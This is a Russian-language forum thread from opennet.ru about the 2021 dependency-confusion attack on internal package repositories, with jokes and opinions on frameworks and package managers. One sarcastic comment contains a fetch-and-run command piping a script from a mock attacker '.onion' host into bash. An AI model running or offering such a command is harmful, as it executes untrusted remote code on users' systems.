https://www.opennet.dev/openforum/vsluhforumID3/123238.html Представлен поразительный по своей простоте метод атаки на зависимости в приложениях, при разработке которых используются внутренние репозитории пакетов. Выявившие проблему исследователи смогли выполнить свой код на внутренних серверах 35 компаний, среди которых PayPal, Micrоsoft, Apple, Netflix, Uber, Tesla и Shopify. Взломы проводились в рамках программ Bug Bounty, согласованно с атакуемыми компаниями, и уже принесли авторам 130 тысяч долларов, выплаченных в форме вознаграждений за выявление уязвимостей (выплаты продолжают поступать)...<br><br>Подробнее: https://www.opennet.ru/opennews/art.shtml?num=54566<br> https://www.opennet.dev/openforum/vsluhforumID3/123238.html#205 Mon, 01 Mar 2021 11:58:29 GMT Наши деды славные победы, вот где наши деды <br> https://www.opennet.dev/openforum/vsluhforumID3/123238.html#204 Fri, 26 Feb 2021 11:09:05 GMT Вполне нормальное явление. Иначе зачем все эти либы и фреймворки, сильные обойдутся и без них. А я слабый, пользуюсь либами и фреймворками.<br> https://www.opennet.dev/openforum/vsluhforumID3/123238.html#203 Thu, 18 Feb 2021 15:52:05 GMT Принцип модульности Орлова: если из распечатки одного модуля программы можно свить веревку, на которой можно повесить программиста, его написавшего, то все это следует сделать.<br> https://www.opennet.dev/openforum/vsluhforumID3/123238.html#202 Thu, 18 Feb 2021 10:30:56 GMT В смысле, никто не думал заранее?<br><br>Я всегда считал это багом многих утилит работы с пакетами.<br><br>А вот, например, в `docker pull` явно прописывается адрес регистри. <br><br> https://www.opennet.dev/openforum/vsluhforumID3/123238.html#201 Tue, 16 Feb 2021 15:46:17 GMT А в яйце игла<br> https://www.opennet.dev/openforum/vsluhforumID3/123238.html#200 Mon, 15 Feb 2021 11:14:53 GMT Ваш комментарий в моей голове был озвучен голосом нежити из Варкрафта 3 )) <br> https://www.opennet.dev/openforum/vsluhforumID3/123238.html#199 Sun, 14 Feb 2021 20:56:14 GMT в русте зависимости ставятся через wget https://sploit.onion/l33t.sh &#124; bash. до менеджера пакета форк-бомба просто не дойдёт - сработает раньше. безопасность же.<br> https://www.opennet.dev/openforum/vsluhforumID3/123238.html#198 Sun, 14 Feb 2021 05:14:07 GMT &gt; давайте тогда делать вебсайты без этих ваших фреймворков и MVC, будем складывать <br>&gt; все в условный index.php, чтобы чувствовать себя сильными кодерами <br><br>ЧСХ пока так делали - работало явно лучше. Во всяком случае, гиг RAM на рендер не жрало и не грузилось по 5 минут, даже несмотря на тормозные диалапы с GPRS и ADSL-ями.<br> https://www.opennet.dev/openforum/vsluhforumID3/123238.html#197 Sun, 14 Feb 2021 02:43:24 GMT На этот случай есть безопасТное восстановление паролей через ваши безопасТные мобильники. Номера на которых сейчас не подделывает только ленивый.<br>